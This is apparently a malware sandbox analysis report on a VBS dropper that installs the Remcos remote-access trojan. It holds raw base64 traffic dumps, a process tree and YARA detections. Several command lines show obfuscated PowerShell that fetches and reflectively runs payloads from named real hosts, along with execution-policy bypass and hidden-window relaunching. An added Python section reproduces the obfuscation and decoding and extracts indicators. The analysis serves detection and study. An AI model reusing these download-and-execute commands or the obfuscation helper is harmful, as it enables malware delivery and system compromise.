                                  2024-09-26 08:55:38 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 2f 6e 58 65 61 2b 66 6b 52 61 38 2f 70 6d 36 32 2f 48 63 77 30 2f 2f 32 62 2f 2f 2f 33 66 2f 2f 2f 7a 4e 33 72 76 73 6b 53 65 4d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/nXea+fkRa8/pm62/Hcw0//2b///3f///zN3rvskSeMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                  2024-09-26 08:55:38 UTC16384INData Raw: 41 55 6b 6c 45 44 41 51 41 52 47 64 7a 42 6b 62 76 6c 47 64 77 56 32 59 34 56 32 58 6b 46 6d 59 57 46 30 50 75 41 41 41 41 41 41 41 46 5a 4a 78 41 41 41 51 41 52 47 64 7a 42 45 51 41 52 58 5a 30 46 47 64 7a 4a 57 54 66 56 46 52 45 42 45 64 32 4e 57 5a 6b 39 32 59 6b 38 6a 56 42 39 6a 4c 41 41 41 41 41 41 51 52 57 53 4d 41 41 42 45 5a 30 4e 48 51 45 42 55 5a 77 6c 48 64 6a 52 79 50 57 46 30 50 75 41 41 41 41 41 41 41 46 5a 4a 78 41 41 41 41 41 41 45 51 6b 52 33 63 41 56 32 63 68 4a 32 58 6c 42 58 65 30 4e 57 56 42 39 6a 4c 41 41 41 41 41 41 51 52 57 53 4d 41 41 41 45 51 6b 52 33 63 41 56 32 63 68 4a 32 58 30 5a 33 59 6c 52 32 62 6a 5a 56 51 2f 34 43 41 41 41 41 41 41 55 6b 6c 45 44 41 41 41 41 45 51 6b 52 33 63 41 56 47 64 6c 78 57 5a 6b 39 31 64 6c 35 32
                                  Data Ascii: AUklEDAQARGdzBkbvlGdwV2Y4V2XkFmYWF0PuAAAAAAAFZJxAAAQARGdzBEQARXZ0FGdzJWTfVFREBEd2NWZk92Yk8jVB9jLAAAAAAQRWSMAABEZ0NHQEBUZwlHdjRyPWF0PuAAAAAAAFZJxAAAAAAEQkR3cAV2chJ2XlBXe0NWVB9jLAAAAAAQRWSMAAAEQkR3cAV2chJ2X0Z3YlR2bjZVQ/4CAAAAAAUklEDAAAAEQkR3cAVGdlxWZk91dl52
                                  2024-09-26 08:55:38 UTC16384INData Raw: 41 41 41 41 41 38 2f 2f 2f 37 50 41 41 41 41 41 2f 2f 2f 2f 6f 43 41 41 41 41 77 2f 2f 2f 76 2f 41 4d 55 6f 30 41 77 51 68 71 43 41 41 41 41 41 41 4d 55 6f 6c 42 41 41 41 41 77 2f 2f 2f 76 2f 41 41 41 41 41 38 2f 2f 2f 44 4e 41 41 41 41 41 2f 2f 2f 2f 2b 44 41 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 52 6c 54 4a 41 41 41 51 41 5a 4d 5a 42 69 41 51 52 2b 78 34 2f 2f 2f 2f 2f 41 41 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 59 55 35 6f 42 41 41 41 45 51 47 54 57 67 49 41 55 6b 66 76 2b 2f 2f 2f 2f 50 41 41 41 51 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 6b 78 6b 46 49 43 41 44 4a 6c
                                  Data Ascii: AAAAA8///7PAAAAA////oCAAAAw///v/AMUo0AwQhqCAAAAAAMUolBAAAAw///v/AAAAA8///DNAAAAA////+DAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAgRlTJAAAQAZMZBiAQR+x4/////AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAYU5oBAAAEQGTWgIAUkfv+////PAAAQBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkxkFICADJl
                                  2024-09-26 08:55:38 UTC16384INData Raw: 79 55 7a 51 44 4e 55 51 32 6b 54 4d 44 56 30 51 46 46 30 4e 33 45 45 4d 43 68 44 4e 79 49 45 52 77 45 55 4d 34 55 6a 52 45 52 6b 4d 33 4d 44 4e 47 46 44 4f 45 52 7a 4d 32 63 7a 51 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 59 55 52 42 4a 7a 51 46 4e 44 52 45 56 45 4f 44 56 44 4f 42 4a 44 52 35 45 44 52 46 4a 54 51 34 51 45 4f 35 4d 6a 4e 31 59 7a 51 42 56 7a 4e 34 4d 54 4d 77 55 6a 52 34 67 44 4d 30 45 7a 4d 77 49 54 4d 78 51 54 4d 34 55 6b 52 46 5a 7a 51 35 51 55
                                  Data Ascii: yUzQDNUQ2kTMDV0QFF0N3EEMChDNyIERwEUM4UjRERkM3MDNGFDOERzM2czQGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYURBJzQFNDREVEODVDOBJDR5EDRFJTQ4QEO5MjN1YzQBVzN4MTMwUjR4gDM0EzMwITMxQTM4UkRFZzQ5QU
                                  2024-09-26 08:55:38 UTC16384INData Raw: 5a 68 42 39 75 5a 43 65 4a 30 38 4f 37 75 33 32 63 4f 6d 62 6f 6a 52 66 6e 43 42 72 5a 75 44 79 6c 49 78 73 50 58 64 4c 70 2b 47 30 54 79 58 61 64 42 6f 76 66 4f 38 72 31 4c 59 4f 33 37 6c 4c 59 6a 4c 36 51 32 34 45 43 62 76 66 47 4a 47 56 66 78 38 6d 71 68 6e 6b 4e 41 6c 4f 64 53 4f 4c 74 2b 4c 70 2f 63 72 6a 6d 6f 74 65 65 6a 53 70 31 48 34 7a 6d 53 39 43 32 67 70 79 69 36 50 6a 34 45 64 77 5a 6e 6b 54 48 66 34 4d 51 2b 75 49 39 78 43 32 57 42 2f 50 61 41 4b 2f 4d 53 4d 71 70 54 6d 49 48 52 4a 53 36 48 42 63 35 6d 5a 71 7a 61 42 62 72 45 38 34 51 66 6e 68 53 78 65 44 79 43 7a 38 63 37 35 4c 4c 31 52 4b 68 32 32 78 35 4c 54 45 75 75 62 50 34 4c 74 53 6b 30 58 68 47 48 42 49 45 65 70 49 41 4e 78 59 46 43 68 51 78 77 74 79 58 54 65 38 6a 68 62 37 38 6a 6d
                                  Data Ascii: ZhB9uZCeJ08O7u32cOmbojRfnCBrZuDylIxsPXdLp+G0TyXadBovfO8r1LYO37lLYjL6Q24ECbvfGJGVfx8mqhnkNAlOdSOLt+Lp/crjmoteejSp1H4zmS9C2gpyi6Pj4EdwZnkTHf4MQ+uI9xC2WB/PaAK/MSMqpTmIHRJS6HBc5mZqzaBbrE84QfnhSxeDyCz8c75LL1RKh22x5LTEuubP4LtSk0XhGHBIEepIANxYFChQxwtyXTe8jhb78jm
                                  2024-09-26 08:55:38 UTC16384INData Raw: 39 6b 44 2f 34 78 51 6b 68 33 78 50 55 43 6e 72 65 62 4a 67 41 30 44 4f 72 6c 67 2f 37 44 54 42 2f 73 34 56 64 61 72 33 41 41 51 50 2b 55 41 4f 74 45 31 39 62 38 44 66 44 67 71 43 6b 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 2f 6f 6c 65 73 39 72 4c 42 68 77 76 79 72 6e 38 63 66 58 73 31 41 6b 46 72 2b 70 66 59 6b 35 39 2f 77 76 61 43 77 74 6c 31 49 4e 77 6c 6b 4d 67 71 56 44 68 56 42 4d 43 54 6d 41 5a 70 45 59 50 41 56 54 69 55 59 38 6c 4f 6e 2f 66 77 44 41 41 41 41 41 41 42 38 48 38 41 41 41 41 41 41 51 41 2f 42 50 41 41 41 41 41 41 41 77 2f 77 44 41 41 41 41 41 41 41 4d 45 4d 41 41 41 41 41 41 41 41 44 42 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                  Data Ascii: 9kD/4xQkh3xPUCnrebJgA0DOrlg/7DTB/s4Vdar3AAQP+UAOtE19b8DfDgqCkDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/oles9rLBhwvyrn8cfXs1AkFr+pfYk59/wvaCwtl1INwlkMgqVDhVBMCTmAZpEYPAVTiUY8lOn/fwDAAAAAAB8H8AAAAAAQA/BPAAAAAAAw/wDAAAAAAAMEMAAAAAAAADBDAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                  2024-09-26 08:55:38 UTC16384INData Raw: 39 47 69 61 45 42 4e 43 6c 32 7a 76 48 58 4e 49 6b 4b 43 41 41 30 4c 54 4a 71 4c 5a 79 72 56 56 2f 69 63 71 74 6d 41 53 67 43 51 76 41 78 78 59 6e 56 56 7a 43 38 62 79 39 56 6b 34 45 42 49 41 39 57 30 6c 75 42 6f 59 47 2f 78 76 4b 2f 55 37 61 74 4c 6f 41 30 72 53 62 6c 5a 36 66 6b 32 74 2f 75 73 4a 67 75 2f 67 67 44 51 76 6e 51 49 6b 4f 49 55 74 34 38 37 79 38 7a 56 48 62 42 4f 41 39 57 51 39 4e 54 75 6b 49 6e 7a 76 4d 50 4e 6d 6f 37 44 67 41 30 37 4b 6b 52 34 75 50 43 53 43 2f 32 4d 72 51 35 66 62 41 42 51 76 32 38 6d 70 7a 2f 50 2f 41 2f 72 7a 47 36 58 43 39 41 4d 41 39 32 54 46 32 42 53 78 53 46 38 76 50 2f 6c 71 2b 46 48 6f 41 30 4c 50 70 4a 48 79 54 55 65 51 2f 43 64 48 69 77 49 39 41 41 51 76 44 64 4d 4c 50 68 33 33 68 2b 4c 30 4d 69 46 6a 61 44 48
                                  Data Ascii: 9GiaEBNCl2zvHXNIkKCAA0LTJqLZyrVV/icqtmASgCQvAxxYnVVzC8by9Vk4EBIA9W0luBoYG/xvK/U7atLoA0rSblZ6fk2t/usJgu/ggDQvnQIkOIUt487y8zVHbBOA9WQ9NTukInzvMPNmo7DgA07KkR4uPCSC/2MrQ5fbABQv28mpz/P/A/rzG6XC9AMA92TF2BSxSF8vP/lq+FHoA0LPpJHyTUeQ/CdHiwI9AAQvDdMLPh33h+L0MiFjaDH
                                  2024-09-26 08:55:38 UTC16384INData Raw: 41 34 47 41 68 42 77 59 41 6b 47 41 79 42 51 5a 41 30 47 41 68 42 41 41 41 41 41 41 6f 42 77 63 41 6b 47 41 73 42 77 5a 41 34 47 41 6c 42 41 49 41 34 47 41 68 42 77 59 41 6b 47 41 79 42 51 5a 41 30 47 41 68 42 41 41 41 41 41 41 75 42 51 59 41 4d 47 41 70 42 67 63 41 55 47 41 74 42 51 59 41 55 45 75 45 41 51 52 34 43 4b 41 46 74 4c 70 41 55 45 75 55 2b 44 34 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 2f 34 44 41 41 41 41 41 41 41 41 41 45 41 41 41 41 41 41 41 41 2f 42 4f 41 41 41 41 41 41 41 77 2f 67 44 41 41 41 41 41 41 41 41 49 41 41 41 41 41 41 41 41 41 2f 44 50 41 41 41 41 41 41 41 77 66 77 44 41 41 41 41 41 41 41 38 48 38 41 41 41 41 41 41 51 41 2f 65 66 46 48 42 45 41 41 41 77 2f 2f 2f 2f 2f 34 44 41 41 41 38 6a 35 75 49 6b 2f 36 6e 7a
                                  Data Ascii: A4GAhBwYAkGAyBQZA0GAhBAAAAAAoBwcAkGAsBwZA4GAlBAIA4GAhBwYAkGAyBQZA0GAhBAAAAAAuBQYAMGApBgcAUGAtBQYAUEuEAQR4CKAFtLpAUEuU+D4AAAAAAAAAAAAAAAAAAw/4DAAAAAAAAAEAAAAAAAA/BOAAAAAAAw/gDAAAAAAAAIAAAAAAAAA/DPAAAAAAAwfwDAAAAAAA8H8AAAAAAQA/efFHBEAAAw/////4DAAA8j5uIk/6nz


                                  Target ID:0
                                  Start time:04:55:04
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
                                  Imagebase:0x7ff67be20000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:1
                                  Start time:04:55:05
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:2
                                  Start time:04:55:05
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:3
                                  Start time:04:55:06
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000003.00000002.2965204743.0000029B32A20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_DLAgent09, Description: Detects known downloader agent, Source: 00000003.00000002.2965204743.0000029B32A20000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.2423857034.0000029B2A788000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.2423857034.0000029B2A788000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.2423857034.0000029B2A788000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  Reputation:high
                                  Has exited:true
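The Target ID 1 command line is the entire stage-1 decoder: the blob is ordinary base64 of the UTF-16LE script in which every 'A' was swapped for a space, so `.replace(' ','A')`, `FromBase64String` and `Unicode.GetString` restore it, and `%pzAcOgInMr%` is then replaced with the dropper's own path before the result is handed to a second powershell.exe. What comes out is the Target ID 3 command line, which in turn hides the next download URL by passing it reversed ('...//:sptth') to the reflectively loaded assembly. The Python below is an added example, not code from the report or from the malware: it reproduces both steps and extracts the indicators. One caveat it handles: the rendered report collapses runs of spaces inside the blob (the first 40 characters should read `J Bi Gk awB5 Gc I  9 C  Jw w DE Mw n Ds`, with two double spaces), so the blob as displayed above does not decode; the length check catches that. The stage-2 text in the block is constructed from the Target ID 3 command line with the placeholder put back, and the prefix constant is the report's real first 40 characters with their spacing restored.

```python
import base64
import re

# Added example, not code from the report or the malware. Placeholder, paths and string
# literals below are taken from the command lines of Target ID 1 and Target ID 3.
PLACEHOLDER = "%pzAcOgInMr%"
VBS_PATH = r"C:\Users\user\Desktop\sostener.vbs"

# Constructed stage-2 script: the Target ID 3 command line with the placeholder put back,
# i.e. the text stage 1 decodes before its .replace() call.
STAGE2 = (
    "$bikyg = '013';$knwmx = '%pzAcOgInMr%';"
    "[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient)"
    ".DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));"
    "[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1')"
    ".GetMethod('ZxKHG').Invoke($null, [object[]] "
    "('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , "
    "$knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
)

# First 40 characters of the real blob with its double spaces intact (the rendered
# report collapses them); this decodes to "$bikyg = '013';".
REPORT_PREFIX = "J Bi Gk awB5 Gc I  9 C  Jw w DE Mw n Ds "


def obfuscate(script: str) -> str:
    """How the blob is produced: script -> UTF-16LE -> base64 -> every 'A' becomes a space."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return b64.replace("A", " ")


def deobfuscate(blob: str, vbs_path: str) -> str:
    """The loader's own steps: replace(' ','A') -> FromBase64String -> Unicode.GetString -> placeholder swap."""
    b64 = blob.replace(" ", "A")
    if len(b64) % 4:
        # Lost whitespace (e.g. copied from a rendered page) shows up here before decoding garbage.
        raise ValueError(f"base64 length {len(b64)} is not a multiple of 4; spaces were collapsed")
    script = base64.b64decode(b64).decode("utf-16-le")
    return script.replace(PLACEHOLDER, vbs_path)


def extract_iocs(script: str) -> dict:
    """Plain URLs, reversed URLs, the .NET type/method invoked, and the dropper path handed to it."""
    urls = re.findall(r"https?://[^\s'\"]+", script)
    # Stage 2 passes its payload URL reversed; any literal ending in '//:sptth' is one.
    for lit in re.findall(r"'([^']*)'", script):
        if lit.endswith(("//:sptth", "//:ptth")):
            urls.append(lit[::-1])
    load = re.search(r"GetType\('([^']+)'\)\.GetMethod\('([^']+)'\)", script)
    path = re.search(r"\$knwmx = '([^']*)'", script)
    return {
        "urls": urls,
        "type": load.group(1) if load else None,
        "method": load.group(2) if load else None,
        "vbs_path": path.group(1) if path else None,
    }


if __name__ == "__main__":
    script = deobfuscate(obfuscate(STAGE2), VBS_PATH)
    print(extract_iocs(script))
    print(deobfuscate(REPORT_PREFIX, VBS_PATH))
```

The same decoder applies unchanged to the Target ID 19 blob, which differs only in the path substituted for the placeholder (the %TEMP% copy of sostener.vbs). The reversed literal unreverses to https://www.informacionoportuna.com/wp-content/uploads/2024/07/remcos.txt, the second download that the ZxKHG method performs on stage 2's behalf.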

                                  Target ID:4
                                  Start time:04:55:08
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:5
                                  Start time:04:55:08
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:6
                                  Start time:04:55:09
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:7
                                  Start time:04:55:11
                                  Start date:26/09/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                  Imagebase:0x170000
                                  File size:45'984 bytes
                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:8
                                  Start time:04:55:11
                                  Start date:26/09/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                  Imagebase:0xc20000
                                  File size:45'984 bytes
                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3325855778.0000000002DEF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3320747702.0000000001217000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:false

                                  Target ID:9
                                  Start time:04:55:11
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:13
                                  Start time:04:55:23
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:14
                                  Start time:04:55:23
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:15
                                  Start time:04:55:24
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs"
                                  Imagebase:0x7ff67be20000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:16
                                  Start time:04:55:24
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:17
                                  Start time:04:55:25
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
